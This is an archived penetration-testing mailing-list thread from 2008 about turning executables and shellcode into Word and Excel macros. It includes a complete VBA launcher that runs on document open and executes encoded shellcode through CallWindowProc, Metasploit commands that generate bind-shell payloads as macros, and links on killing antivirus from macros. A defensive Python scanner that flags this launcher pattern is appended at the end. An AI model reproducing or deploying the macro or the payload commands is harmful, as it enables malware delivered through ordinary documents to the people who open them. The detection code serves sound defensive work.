Penetration Testing mailing list archives
RE: Exe2vba - Anybody still have this?
From: "Brett Moore" <brett.moore () insomniasec com>
Date: Tue, 18 Nov 2008 15:28:39 +1300
A paper that has some interesting concepts yet I think went under the radar of most people:

http://www.milw0rm.com/papers/185

I have used the concept as a .aspx shellcode launcher, but I haven't tested the VBA example given.

---------------
Naturally, another vector is VBA macros. Most users set protection against macro execution to medium, so you can easily write code like this:

Private Declare Function CallWindowProc Lib "user32" Alias "CallWindowProcA" _
    (ByVal lpPrevWndFunc As Long, ByVal hWnd As Long, ByVal Msg As Any, _
     ByVal wParam As Any, ByVal lParam As Any) As Long

Private Sub Document_Open()
    On Error GoTo hell
    For i = 1 To 12
        nop = nop & Chr(144)
    Next i
    shellcode = nop & "ëıYëıèøÿÿÿOIIIIIIQZVTX630VX4A0B6HH0B30BCVX2BDBH4A2AD0" & _
        "ADTBDQB0ADAVX4Z8BDJOMNOJNF4BPB0BPK8EDNCK8NGE0JGA0ONKH" & _
        "OTJAK8OUBRA0KNITKHF3KHAPPNACBLIYNJFHBLFGGPALLLMPAPDLK" & _
        "NFOKCF5FRF0E7ENKXOEFBAPKNHFKHN0KDKHO5NAA0KNK8NQK8APKN" & _
        "I8NEF2FPCLA3BLFFKHB4B3E8BLJGN0K8B4NPKXBGNAMJKXJ6J0KNI" & _
        "PKHBHBKB0BPB0K8JVNCOUA3HOBFH5I8JOCXBLK7BUJ6BOLXFPO5J6" & _
        "JYPOL8PPGUOOGNCVAVNFCVP2EFJ7E6BPZ" & nop
    TextBox1.Text = shellcode
    CallWindowProc 2089148898, 1, TextBox1.Text, ByVal 0&, ByVal 0&  '2089148898 = 0x7C85E1E2 CALL [EBP+1C] from kernel32.dll
    Exit Sub
hell:
    MsgBox "There was something wrong..." & vbCrLf & _
        "Error number: " & Err.Number & vbCrLf & _
        "Error description: " & Err.Description
End Sub
--------------------

Removes the requirement for a writeable/executable location etc.

Brett

-----Original Message-----
From: listbounce () securityfocus com [mailto:listbounce () securityfocus com] On Behalf Of natron
Sent: Monday, 17 November 2008 3:50 p.m.
To: H D Moore; pen-test () securityfocus com; Joseph McCray
Subject: Re: Exe2vba - Anybody still have this?

I wrote up a quick series of posts on how to use VBA to do all kinds of things, as long as the user running the Excel/Word file has the necessary rights.
If anyone would find them useful:

Running commands or launching programs:
http://blog.invisibledenizen.org/2008/11/on-vba-in-excel-and-word-documents.html

Downloading files and saving them to disk:
http://blog.invisibledenizen.org/2008/11/vba-function-to-download-files.html

Running commands as SYSTEM:
http://blog.invisibledenizen.org/2008/11/running-commands-as-system-from-vba-in.html

Killing off any antivirus that may be running:
http://blog.invisibledenizen.org/2008/11/how-to-kill-antivirus-from-word-or.html

Modifying the Windows Firewall:
http://blog.invisibledenizen.org/2008/11/modifying-windows-firewall-rules-from.html

What I would really love to see would be a combination of the Churrasco exploit (http://nomoreroot.blogspot.com/2008/10/token-kidnapping-windows-2008-poc.html) into VBA, so that even if the user is running in a limited account, they'd be able to gain SYSTEM privileges.

-n

On Wed, Nov 12, 2008 at 1:21 PM, H D Moore <sflist () digitaloffense net> wrote:
Hi Joseph,

I added this to Metasploit. You can use the VBA generator in a few different ways:

1) Convert an EXE to a VBA script (works on Word/Excel automatically):

   $ ruby msf3/tools/exe2vba.exe mytrojan.exe output.vba

2) Create a VBA script that runs a Metasploit payload:

   $ ruby msf3/msfpayload windows/shell_bind_tcp LPORT=12345 V > output.vba

3) Create a VBA script that runs an encoded Metasploit payload:

   $ ruby msf3/msfpayload windows/shell_bind_tcp LPORT=12345 R | \
     ruby msf3/msfencode -a x86 -b '' -t vba > output.vba

To use the resulting VBA, open Word/Excel, go to Tools -> Macros -> Visual Basic Editor, paste in, save, and exit. Works pretty well here :-)

You need the latest SVN of Metasploit 3.2 trunk:

   $ svn co http://metasploit.com/svn/framework3/trunk/

On Windows, follow this guide:
- http://metasploit.com/dev/trac/wiki/Metasploit/Windows/Upgrade_to_SVN

-HD

On Tuesday 11 November 2008, Joseph McCray wrote:
> It used to be located at: http://www.priestmaster.org/tools.html
> I've been looking all over the web and really haven't been able to find this app anymore.

------------------------------------------------------------------------
This list is sponsored by: Cenzic
Security Trends Report from Cenzic
Stay Ahead of the Hacker Curve! Get the latest Q2 2008 Trends Report now
www.cenzic.com/landing/trends-report
------------------------------------------------------------------------
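Seen from the defender's side, the macro launcher Brett quotes has a recognizable shape in the module source: an auto-executing procedure, a Declare of a user32 function that will jump to an arbitrary address, a Chr(144) NOP sled built in a loop, a call with a hard-coded numeric address, and a long opaque alphanumeric string. The scanner below is an added example, not code from the thread or from Metasploit; the sample macros, indicator names and the blob threshold are constructed for this example, and the first sample carries a placeholder string rather than a payload.

```python
import re

# Constructed sample macros for this example. The first mirrors the launcher
# shape discussed in the thread but holds a placeholder blob, not a payload.
SUSPICIOUS_MACRO = '''Private Declare Function CallWindowProc Lib "user32" Alias "CallWindowProcA" _
    (ByVal lpPrevWndFunc As Long, ByVal hWnd As Long, ByVal Msg As Any, _
     ByVal wParam As Any, ByVal lParam As Any) As Long
Private Sub Document_Open()
    For i = 1 To 12
        nop = nop & Chr(144)
    Next i
    blob = nop & "''' + "A" * 64 + '''" & _
        "''' + "B" * 64 + '''" & _
        "''' + "C" * 64 + '''" & _
        "''' + "D" * 64 + '''" & nop
    TextBox1.Text = blob
    CallWindowProc 2089148898, 1, TextBox1.Text, ByVal 0&, ByVal 0&
End Sub
'''
BENIGN_MACRO = 'Sub FormatReport()\n    Range("A1").Font.Bold = True\nEnd Sub\n'

# Each indicator is a regex run over the whole module text (VBA is case-insensitive).
INDICATORS = {
    # procedures Office runs on its own when the document is opened
    "autoexec": re.compile(r"\bSub\s+(Document_Open|AutoOpen|Auto_Open|Workbook_Open|AutoExec)\b", re.I),
    # Declare of the user32 function the launcher uses to call an arbitrary address
    "callwindowproc_declare": re.compile(r'\bDeclare\s+Function\s+\w+\s+Lib\s+"user32"\s+Alias\s+"CallWindowProcA?"', re.I),
    # NOP sled assembled from 0x90 bytes
    "nop_sled": re.compile(r"Chr\(\s*(144|&H90)\s*\)", re.I),
    # a call whose first argument is a hard-coded numeric code address
    "hardcoded_call_target": re.compile(r"\bCallWindowProc\s+\d{8,}\s*,", re.I),
}
BLOB_LITERAL = re.compile(r'"([A-Za-z0-9]{40,})"')
BLOB_THRESHOLD = 200  # total chars of long alphanumeric literals before we call it a blob

def scan_vba(src: str) -> dict:
    """Return {indicator_name: bool} for one macro module's source text."""
    hits = {name: bool(rx.search(src)) for name, rx in INDICATORS.items()}
    blob_chars = sum(len(m) for m in BLOB_LITERAL.findall(src))
    hits["opaque_blob"] = blob_chars >= BLOB_THRESHOLD
    return hits

def is_launcher_like(src: str, min_hits: int = 3) -> bool:
    """Flag the module only when several indicators co-occur; any single one
    (Document_Open by itself, for instance) is common in benign macros."""
    return sum(scan_vba(src).values()) >= min_hits

if __name__ == "__main__":
    for label, macro in (("suspicious", SUSPICIOUS_MACRO), ("benign", BENIGN_MACRO)):
        print(label, scan_vba(macro), "->", is_launcher_like(macro))
```

Feed it the module text extracted from a document (for example with olevba) rather than the binary file; the regexes are written against decoded VBA source.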
Current thread:
- Exe2vba - Anybody still have this? Joseph McCray (Nov 11)
- Re: Exe2vba - Anybody still have this? Lucas Lyon (Nov 12)
- Re: Exe2vba - Anybody still have this? H D Moore (Nov 12)
- Re: Exe2vba - Anybody still have this? natron (Nov 17)
- RE: Exe2vba - Anybody still have this? Brett Moore (Nov 17)
- Re: Exe2vba - Anybody still have this? Ulisses Castro (thebug) (Nov 17)
- Re: Exe2vba - Anybody still have this? natron (Nov 17)
- <Possible follow-ups>
- Re: Exe2vba - Anybody still have this? infolookup (Nov 12)